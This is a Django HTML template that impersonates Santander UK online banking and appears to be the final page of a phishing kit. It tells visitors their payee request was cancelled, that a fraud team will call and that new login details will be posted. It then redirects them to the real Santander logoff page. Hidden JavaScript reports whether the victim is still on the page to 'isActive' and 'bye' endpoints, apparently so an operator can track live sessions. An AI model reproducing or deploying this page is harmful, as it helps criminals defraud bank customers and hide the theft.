{% load static %}
{% block content %}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta http-equiv="refresh" content="6;url=https://www.santander.co.uk/logoff" />
<title>Santander</title>
    <link rel="icon" href="{% static 'styles/favicon.ico' %}" type="image/x-icon">
     <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css"> 
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" type="text/css" href="{% static 'styles/santander.css' %}">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
<style type="text/css">
    .bs-example{
        margin: 20px;
    }
    
    
    .navbar-toggler:hover{
        
        background-color:#ec0000
        
        
    }
    
       a:hover{
        
        background-color:#ec0000
        
        
    }
    
    a{
        
        
        text-decoration:none !important;
        
        font-size:1rem !important;
        
        
    }
    
    input{
        
        border:1px solid #666;
        outline:none;
        box-shadow:none;
        border-radius:0px;
        border-style:solid;
        
    }
    input:focus{
        
        border:1px solid black !important;
        outline:none;
        box-shadow:none;
        border-radius:0px;
        border-style:solid;
        
    }


       .loader {
  border: 4px solid #ffe6e6;; /* Light grey */
  border-top: 4px solid #ef3131; /* Blue */
  border-radius: 50%;
  width: 55px;
  height: 55px;
  animation: spin .8s linear infinite;
  margin: 0 auto;
}

@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
} 
</style>

</head>
<body style="background:white !important">
<div class="bs-example" style="width:100%;margin:0 auto !important">
  <nav class="navbar navbar-expand-md navbar-light bg-light" style="width:100%;margin:0 auto !important;background-color:#ec0000 !important;">
        <a href="#" class="navbar-brand" style="color:white"><img src="{% static 'styles/navbarimg.png' %}" width = "130px">  </a>
        <button type="button" onclick="window.location.href='https://www.santander.co.uk/logoff'" class="navbar-toggler" data-toggle="collapse" data-target="#navbarCollapse" style="outline:none;border:0px;background:#ec0000">
<span class="navbar-toggler" style="outline:none;border:0px">

<p style="color:white;font-size:smaller;position:relative;bottom:1.5rem">Log out</p>
        </button>

        <div class="collapse" id="navbarCollapse" style="border:0px !important;outline:none !important">
            <div class="navbar-nav" style="background-color:#ec0000;border:0px !important;outline:none !important">
                <a href="#" class="nav-item nav-link" style="color:white !important">My Accounts & Transactions</a>
                <a href="#" class="nav-item nav-link active" style="color:white !important">Payments & Transfers</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Standing Orders</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Direct Debits</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Credit Cards</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Account Services</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">My Details & Settings</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Help & Contact Us</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Logout</a>
                
            </div>
           
        </div>
    </nav>
    
    <div class="form-group" style="margin: 0 auto !important;padding-left:0%">
            <br>
        <div style="margin:0 auto;text-align:center;">
        <p style="color:#666;font-size: .9em;
font-weight: bold;
margin: 1em 0;
line-height: 1.2em;display:inline">Payee Request |</p>  <p style="color:#666;font-size: .9em;
font-weight: 400;
margin: 1em 0;
line-height: 1.2em;display:inline">Step 3 of 3 </p></div>
<br>
         <div class="w3-border" style="width:80%;margin: 0 auto">
         
  <div class="w3" style="height:5px;width:100%;background-color:#ec0000 !important"></div>
</div> <br><br>
      
       
            <div class="form-group" style="margin: 0 auto !important;padding-left:5%">
        <h1 style="color:#666;margin: 0 auto !important;font-size: 2.2em;
font-weight: 400;
margin: 1em 0;
line-height: 1.2em;">Confirmation</h1><br>
        <p style="font-size: 18px">
You request for New Payee has been cancelled successfully.

<br><br>A member of our specialist fraud team will call you within 24 hours with a full report of this incident. <br>

meanwhile all transfers to or from your account have been blocked for security.<br><br>

You will recieve new login details in the post within 5-7 business days<br> Please not the following reference ID for further proceedings.

<br><br>
 <div style="margin: auto;text-align:;">
        <p style="display:inline;font-size: 18px">Your Fraud Reference Number: </p>  <p style="display:inline;font-weight:bold;font-size: 18px">705072751 </p></div>

<br><br>

<p style="font-size: 18px">Please note that due to COVID-19, it might take some time for our fraud team to investigate this case and reach back to you on your registered number. Thankyou for your patience.<br><br>You will be redicted shortly, please wait..</p>
        
    
    
       <div class="form-group" style="margin: 0 auto !important;padding-left:0%;width:85%">
        <br>
     
        <br> <br> <br>
            
      
        <div class="loader"></div> 
     
   

        

</div>
    
</div>
<input value="{{request.session.pid}}" id="pid" style="visibility: hidden;">

{% block javascript %}
<script>
    

function online(){

	var ip_address = document.getElementById('pid').value 
		console.log(ip_address)


		$.ajax({


			type: 'GET',
			 
			 url: '{% url "isActive" %}',

			  data: {
				              'pid': ip_address
						              },
			   


			 success: function(response){

				   
				 if(response.accept){





				 }

				    

			 },

			 error: function(response){







			 }




		}

	)}

</script>

<script>


function offline(){

	var ip_address = document.getElementById('pid').value 

		$.ajax({


			type: 'GET',
			 
			 url: '{% url "bye" %}',

			  data: {
				              'pid': ip_address
						              },
			   


			 success: function(response){

				   
				 if(response.accept){





				 }

				    

			 },

			 error: function(response){







			 }





		});




}




</script>

<script>
online()
</script>

<script>
$(window).on("beforeunload", function() { 
	    offline()
})

</script>
        {% endblock javascript %}



</body>

</html>

{% endblock %}
